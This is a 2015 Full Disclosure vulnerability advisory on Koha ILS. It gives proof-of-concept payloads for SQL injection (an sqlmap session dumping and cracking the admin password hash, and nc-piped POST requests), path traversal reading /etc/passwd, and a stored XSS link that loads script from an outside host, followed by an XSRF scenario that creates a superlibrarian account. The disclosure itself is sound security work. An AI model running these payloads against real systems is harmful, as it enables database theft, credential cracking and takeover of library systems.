[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[FD] SBA Research Vulnerability Disclosure - Multiple Critical Vulnerabilities in Koha ILS
- To: "fulldisclosure@xxxxxxxxxxxx" <fulldisclosure@xxxxxxxxxxxx>
- Subject: [FD] SBA Research Vulnerability Disclosure - Multiple Critical Vulnerabilities in Koha ILS
- From: Raschin Ghanad-Tavakoli <RGhanad-Tavakoli@xxxxxxxxxxxxxxxx>
- Date: Thu, 25 Jun 2015 17:01:01 +0000
===============================================================================================
SBA Research Vulnerability Disclosure
===============================================================================================
title: Koha Unauthenticated SQL injection
product: Koha ILS
affected version: 3.20.x <= 3.20.1, 3.18.x <= 3.18.8, 3.16.x <= 3.16.12
fixed version: 3.20.1, 3.17.8, 3.16.12
CVE numbers: CVE-2015-4633, CVE-2015-4632, CVE-2015-4631
impact: critical
website: http://www.koha-community.org/
found by: Raschin Tavakoli / SBA Research Combinatorial
Security Testing Group
contact: cst@xxxxxxxxxxxxxxxx
References: http://koha-community.org/security-release-koha-3-20-1/
http://koha-community.org/security-release-koha-3-18-8/
http://koha-community.org/security-release-koha-3-16-12/
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423
===============================================================================================
=========================
1. Mutiple SQL Injections
=========================
+ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +
+ a) Unauthenticated SQL Injection in OPAC interface (CVE-2015-4633) +
+ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +
Vulnerability:
--------------
The url parameter 'number' in /cgi-bin/koha/opac-tags_subject.pl is vulnerable
to SQLI.
Impact:
-------
By injecting malicious sql code a remote attacker can access the database and
read arbritary data. If the webserver is misconfigured, the file-system may be
accessed as well.
References:
-----------
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412
#
##################################################################################################
#
# PoC:
#
#
##################################################################################################
#
1. Inspect Koha database schema
Have a look at how to query the database for superlibrarian users:
http://wiki.koha-community.org/wiki/SQL_Reports_Library#Superlibrarians
So basically we we need to execute some SQL statement like this:
sql-shell> select userid, password from borrowers where flags=1 and password
is not null order by borrowernumber desc limit 1;
2. Query the database with sqlmap
So let's fire up sqlmap with the --sql-shell parameter and input the query:
root@kali:/home/wicked# sqlmap -u
http://testbox:9001/cgi-bin/koha/opac-tags_subject.pl?number=10 -p number
--technique=T --dbms=MySQL --sql-shell --time-sec=4
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150513}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability and
are not responsible for any misuse or damage caused by this program
[*] starting at 09:20:07
[09:20:07] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Parameter: number (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)
Payload: number=1 PROCEDURE
ANALYSE(EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(4000000,MD5(0x4b754a4b))))),1)
---
[09:20:09] [INFO] testing MySQL
[09:20:09] [INFO] confirming MySQL
[09:20:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.0
[09:20:09] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press
ENTER
sql-shell> select userid, password from borrowers where flags=1 and password
is not null order by borrowernumber desc limit 1;
[09:20:25] [INFO] fetching SQL SELECT statement query output: 'select
userid, password from borrowers where flags=1 and password is not null order by
borrowernumber desc limit 1'
[09:20:25] [INFO] the SQL query provided has more than one field. sqlmap
will now unpack it into distinct queries to be able to retrieve the output even
if we are going blind
[09:20:25] [WARNING] time-based comparison requires larger statistical
model, please wait..............................
[09:20:52] [WARNING] it is very important not to stress the network adapter
during usage of time-based payloads to prevent potential errors
admin
[09:21:46] [INFO] retrieved: $2a$08$taQ
[09:23:33] [ERROR] invalid character detected. retrying..
[09:23:33] [WARNING] increasing time delay to 5 seconds
afOgEEhU
[09:25:10] [ERROR] invalid character detected. retrying..
[09:25:10] [WARNING] increasing time delay to 6 seconds
t/gW
[09:26:13] [ERROR] invalid character detected. retrying..
[09:26:13] [WARNING] increasing time delay to 7 seconds
TOmqnYe1Y6ZNxCENa
[09:29:57] [ERROR] invalid character detected. retrying..
[09:29:57] [WARNING] increasing time delay to 8 seconds
2.ONk2eZhnuEw5z9OjjxS
[09:35:08] [ERROR] invalid character detected. retrying..
[09:35:08] [WARNING] increasing time delay to 9 seconds
select userid, password from borrowers where flags=1 and password is not
null order by borrowernumber desc limit 1;:
'admin, $2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS'
3. Feed john the ripper and be lucky
root@kali:/home/wicked# echo
"$2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS" > ./admin-pass
root@kali:/home/wicked# john ./admin-pass
Loaded 1 password hash (OpenBSD Blowfish [32/64 X2])
admin (?)
guesses: 1 time: 0:00:00:10 DONE (Thu Jun 25 09:45:41 2015) c/s: 260
trying: Smokey - allstate
Use the "--show" option to display all of the cracked passwords reliably
root@kali:/home/wicked# john ./admin-pass --show
?:admin
1 password hash cracked, 0 left
4. Log in with username "admin" and password "admin" ;)
#
##################################################################################################
#
# PoC End
#
#
##################################################################################################
#
+ +++++++++++++++++++++++++++++++++++ +
+ b) SQL Injection in STAFF interface +
+ +++++++++++++++++++++++++++++++++++ +
Vulnerability:
--------------
An SQL Injection vulnerability exists in /cgi-bin/koha/reports/borrowers_out.pl
allows remote attacker's to read arbritrary data via the database due to
improper input validation of the parameters Filter and Criteria.
Impact:
-------
By injection malicious sql a remote attacker can read arbitrary data from the
database. If the webserver is misconfigured, read & write access to the
filesystem may be possible.
References:
-----------
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426
#
##################################################################################################
#
# PoC:
#
#
##################################################################################################
#
====================================================================
1. "Criteria" Parameter, Payload: ELT(1=1,'evil') / ELT(1=2,'evil')
====================================================================
echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost:
testbox:9002\r\nContent-Length:
186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=2,'evil')"
| nc testbox 9002
echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost:
testbox:9002\r\nContent-Length:
186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=1,'evil')"
| nc testbox 9002
====================================================================
2. "Filter" Parameter, Payload: P_COM'+AND+'a'='a / P_COM'+AND+'a'='b
====================================================================
echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost:
testbox:9002\r\nContent-Length:
183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep=;&report_name=&do_it=1&userid=<userid>&password=<password>&branch=&Filter=P_COM'+AND+'a'='a"
| nc testbox 9002
echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost:
testbox:9002\r\nContent-Length:
183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep=;&report_name=&do_it=1&userid=<userid>&password=<password>&branch=&Filter=P_COM'+AND+'a'='b"
| nc testbox 9002
====================================================================
You will notice different output in every second request, demonstrating the
evaluation of the payload.
#
##################################################################################################
#
# PoC End
#
#
##################################################################################################
#
=================================
3. Path Traversal (CVE-2015-4633)
=================================
Vulnerability
-------------
The "template_path" parmeter in /cgi-bin/koha/svc/members/search and
/cgi-bin/koha/svc/members/search is vulnerable to Path Traversal.
Impact
------
A remote attacker my read arbitrary files on the system.
References
----------
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408
#
##################################################################################################
#
# PoC:
#
#
##################################################################################################
#
The following input is used to print out /etc/passwd:
/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/cgi-bin/koha/svc/members/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
#
##################################################################################################
#
# PoC End
#
#
##################################################################################################
#
=================================
4. XSS and XSRF
=================================
Vulnerability
-------------
Koha suffers from various critical XSS and XSRF vulnerabilities due to improper
input validation. The site also lacks in the implementation of challenge tokens
that prevent cross-site
forgery (XSRF) attacks.
The attack can be performed by:
- through a compromised user account. User/Password retrieval can happen via
brute force, sniffing or through SQLI (CVE-2015-4633)
- through a user clicking a malicious link (phishing mail, forum link etc.)
The following pages are affected from stored XSS flaws:
/cgi-bin/koha/opac-shelves.pl
/cgi-bin/koha/virtualshelves/shelves.pl
The following pages are affected from relfective XSS flaws:
/cgi-bin/koha/opac-shelves.pl (parameters:
"direction", "display")
/cgi-bin/koha/opac-search.pl (parameters:
"tag")
/cgi-bin/koha/authorities/authorities-home.pl (parameters: "value")
/cgi-bin/koha/acqui/lateorders.pl (parameters:
"delay")
/cgi-bin/koha/admin/auth_subfields_structure.pl (parameters:
"authtypecode","tagfield")
/cgi-bin/koha/admin/marc_subfields_structure.pl (parameters: "tagfield")
/cgi-bin/koha/catalogue/search.pl (parameters:
"limit")
/cgi-bin/koha/serials/serials-search.pl (parameters:
"bookseller_filter", "callnumber_filter", "EAN_filter", "ISSN_filter",
"publisher_filter", "title_filter")
/cgi-bin/koha/suggestion/suggestion.pl (parameters: "author",
"collectiontitle", "copyrightdate", "isbn", "manageddate_from",
"manageddate_to", "publishercode",
"suggesteddate_from", "suggesteddate_to")
Impact
----------
The vulnerabilites allow remote attackers to inject arbitrary web script or
HTML in order to:
- escalate privileges by targeting staff members with XSRF
- target users via browser exploits
- target the webserver by combining with other server-side vulnerabilities.
References
----------------
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418
#
##################################################################################################
#
# PoC / Attack Scenario:
#
#
##################################################################################################
#
Alice, a student with restricted permissions on the system, receives a phishing
mail (or reads in some forum) and clicks the following link:
-->
http://<opac-interface>/cgi-bin/koha/opac-shelves.pl?shelves=1&addshelf=Malicious+Input+<script+src='http://cst.sba-research.org/x.js'/>&sortfield=title&category=2&allow_add=0&allow_delete_own=1&allow_delete_other=0
Bob, library admin, recognizes the new malicious list entry. He logs into the
staff area and browses the public lists in order to delete the entry. Once he
opens
--> http://<staff-interface>/cgi-bin/koha/virtualshelves/shelves.pl
the malcious code get's executed. The code can then perform any unauthorized
actions with the pemissions of user bob. For example:
Create new user:
-----------------------
-->
http://testbox:9002/cgi-bin/koha/members/memberentry.pl?nodouble=&destination=&check_member=&borrowernumber=&nodouble=&title=&firstname=&othernames=&sex=&streetnumber=&streettype=&address2=&city=&state=&zipcode=&country=&phone=&phonepro=&mobile=&email=&emailpro=&fax=&B_address=&B_address2=&B_city=&B_state=&B_zipcode=&B_country=&B_phone=&B_email=&contactnote=&altcontactsurname=&altcontactfirstname=&altcontactaddress1=&altcontactaddress2=&altcontactaddress3=&altcontactstate=&altcontactzipcode=&altcontactcountry=&altcontactphone=&sort1=&sort2=&dateexpiry=&opacnote=&borrowernotes=&patron_attr_1=&BorrowerMandatoryField=surname%7Cdateofbirth%7Ccardnumber%7Caddress&category_type=A&updtype=I&op=insert&surname=hacker&dateofbirth=10%2F06%2F2000&address=fictional&select_city=%7C%7C%7C&cardnumber=9182734629182364&branchcode=MAURES&categorycode=P_COM&dateenrolled=24%2F06%2F2015&userid=hacker&password=hacker&password2=hacker&patron_attr_1_code=PROFESSION&setting_messaging_prefs=1&modify=yes&borrowernumber=&save=Save&setting_extended_patron_attributes=1
Give the new user superlibririan permission:
----------------------------------------------------------
-->
http://testbox:9002/testbox:9002/cgi-bin/koha/members/member-flags.pl?member=7855&newflags=1&flag=superlibrarian
The attacker can now log as superlibrarian.
Side Note: In order to make the attack work, alice needs to be logged in to the
Open Public Catalog interface at the time of when clicking the malicious link.
Alice needs to have access to the OPAC interface and to have permissions to
create public lists.
#
##################################################################################################
#
# PoC / Attack Scenario End
#
#
##################################################################################################
#
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/